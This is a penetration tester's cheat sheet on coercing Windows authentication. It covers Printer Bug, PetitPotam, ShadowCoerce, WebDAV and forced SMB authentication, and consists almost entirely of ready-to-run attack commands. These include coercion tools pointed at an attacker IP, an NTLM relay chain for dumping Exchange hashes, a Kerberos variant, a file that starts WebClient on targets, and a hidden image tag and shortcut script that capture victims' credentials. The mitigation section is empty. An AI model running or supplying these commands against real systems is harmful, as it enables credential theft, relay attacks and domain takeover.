Authentication Coercion
It's a good idea to check if NTLMv1 downgrade is possible when triggering the callbacks.

Printer Bug (MS-RPRN)

https://twitter.com/DebugPrivilege/status/1410158556540719104
twitter.com
Check if Spooler is running via Remote Registry:
$ rpcdump.py MEGACORP/snovvcrash:'Passw0rd!'@192.168.1.11 | grep -A2 -e MS-RPRN -e MS-PAR

SpoolSample

Cmd > .\SpoolSample.exe 192.168.1.11 10.10.13.37
Cmd > .\SpoolSample.exe 192.168.1.11 [email protected]/test.txt
Cmd > .\SpoolSample.exe 192.168.1.11 [email protected]/test.txt

dementor.py

$ python dementor.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' 10.10.13.37 DC01.megacorp.local
$ python dementor.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' [email protected]/test.txt DC01.megacorp.local
$ python dementor.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' [email protected]/test.txt DC01.megacorp.local

printerbug.py

$ python printerbug.py megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local 10.10.13.37
$ python printerbug.py megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local [email protected]/test.txt
$ python printerbug.py megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local [email protected]/test.txt

PetitPotam (MS-EFSR)

CVE-2021-36942
$ python3 PetitPotam.py -d '' -u '' -p '' 10.10.13.37 192.168.1.11
$ python3 PetitPotam.py -d '' -u '' -p '' [email protected]/test.txt 192.168.1.11
$ python3 PetitPotam.py -d '' -u '' -p '' [email protected]/test.txt 192.168.1.11
Cmd > .\PetitPotam.exe 10.10.13.37 192.168.1.11 1
Cmd > .\PetitPotam.exe [email protected]/test.txt 192.168.1.11 1
Cmd > .\PetitPotam.exe [email protected]/test.txt 192.168.1.11 1
PetitPotam any host (not only a DC with null sessions allowed for the IPC$ share) without initial creds via proxying through an authenticated session on behalf a DC-relayed machine account:
$ python3 Petitpotam.py -d '' -u '' -p '' 10.10.13.37 192.168.1.123
Something went wrong, check error status => SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
$ sudo ntlmrelayx.py -ip 10.10.13.37 -t 192.168.1.123 -smb2support --no-http-server --no-wcf-server -socks
$ python3 Petitpotam.py -d '' -u '' -p '' 10.10.13.37 DC1.megacorp.local
ntlmrelayx> socks
ntlmrelayx> stopservers
$ sudo ./Responder.py -I eth0 -vA
$ proxychains4 python3 Petitpotam.py -d MEGACORP -u 'DC1#x27; -no-pass 10.10.13.37 192.168.1.123
NTLM Relay DC1 to EXCH1 to get SOCKS ➡️ SOCKS proxy PetitPotam to EX1 as DC1$ ➡️ NTLM Relay to EXCH2 to dump hashes
With Kerberos authentication:
$ getTGT.py megacorp.local/snovvcrash -hashes e929e69f7c290222be87968263a9282e:e929e69f7c290222be87968263a9282e -dc-ip 192.168.1.11
$ KRB5CCNAME=`pwd`/snovvcrash.ccache python3 PetitPotam.py -k -no-pass -d megacorp.local -u snovvcrash target.megacorp.local attacker.megacorp.local

Theory

Mitigation

ShadowCoerce (MS-FSRVP)

$ python3 shadowcoerce.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' 10.10.13.37 192.168.1.11

WebDAV (WebClient)

Check if callback via WebDAV (HTTP) is possible. It is when the WebClient service is running. If it's possible, then NTLM Relay to LDAPS on behalf of the relayed machine account is your chance for RBCD workstation takeover.
Check via PowerShell:
PS > Install-Module -Name NtObjectManager
PS > Get-NtFile -Win32Path '\\192.168.1.11\pipe\DAV RPC SERVICE'
Check via CME:
$ cme smb hosts.txt -u snovvcrash -p 'Passw0rd!' -M webdav
Check via GetWebDAVStatus:
PS > .\GetWebDAVStatus.exe SRV01,SRV02 --tc 1

Enable WebClient

Put the .searchConnector-ms file on a writable share. When a domain user opens target folder in explorer, the WebClient service should start automatically:
Documents.searchConnector-ms
<?xml version="1.0" encoding="UTF-8"?>
<searchConnectorDescription xmlns="http://schemas.microsoft.com/windows/2009/searchConnector">
<description>Microsoft Outlook</description>
<isSearchOnlyItem>false</isSearchOnlyItem>
<includeInStartMenuScope>true</includeInStartMenuScope>
<templateInfo>
<folderType>{91475FE5-586B-4EBA-8D75-D17434B8CDF6}</folderType>
</templateInfo>
<simpleLocation>
<url>https://whatever/</url>
</simpleLocation>
</searchConnectorDescription>

Force SMB authentication

Forcing with a hidden image:
<img src="\\10.10.13.37\pwn.ico" height="1" width="1" />
Forcing with a shortcut:
lnk.ps1
$wsh = New-Object -ComObject WScript.Shell
$lnk = $wsh.CreateShortcut("\\SRV01\PublicShare\pwn.lnk")
$lnk.IconLocation = "\\10.10.13.37\pwn.ico"
$lnk.Save()
Last modified 26d ago